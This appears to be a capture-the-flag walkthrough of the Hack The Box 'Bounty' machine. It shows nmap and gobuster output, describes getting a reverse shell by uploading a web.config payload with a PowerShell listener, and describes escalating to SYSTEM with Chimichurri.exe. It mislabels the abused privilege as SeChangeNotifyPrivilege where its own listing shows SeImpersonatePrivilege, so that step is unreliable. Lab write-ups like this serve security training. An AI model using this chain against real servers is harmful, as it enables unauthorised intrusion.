first enumeration with nmap
# Nmap 7.93 scan initiated Fri Jun 2 10:03:16 2023 as: nmap -sC -sV -T4 -oN normal.txt -p 80 -Pn 10.10.10.93
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 2 10:03:30 2023 -- 1 IP address (1 host up) scanned in 14.22 seconds
opening the ip on a browser, got redirected to a page with a merlin picture. let’s fuzz for directories
┌──(n16hth4wk👽n16hth4wk-sec)-[~/Documents/HTB/Bounty]
└─$ gobuster dir -u http://10.10.10.93/ -w /usr/share/wordlists/dirb/common.txt -x aspx
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: aspx
[+] Timeout: 10s
===============================================================
2023/06/03 01:14:29 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
Progress: 9219 / 9230 (99.88%)
===============================================================
2023/06/03 01:17:01 Finished
===============================================================
navigate to transfer.aspx, there is a file upload func there. tried to upload an aspx reverse shell file, got Invalid File. Please try again let’s fuzz for the type of extention that is allowed.
cool we can see the allowed extensions. .config,.doc... let’s look for a .config revshell payload we can create
cool we found one on github web.config, let’s download the file. also we need an Invoke-PowerShellTcp.ps1 file. fire up python http server along with ncat listener.
upload the web.config file. let’s locate this file.
find the file and check back ncat listener.
Bull’s eye we got a reverse shell.
Privilege Escalation
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\windows\system32\inetsrv>
checking privs, we can see we have SeChangeNotifyPrivilege enabled. let’s abuse this. let’s run Chimichurri.exe
running chimichurri.exe IP PORT got a reverse shell as nt authority\system.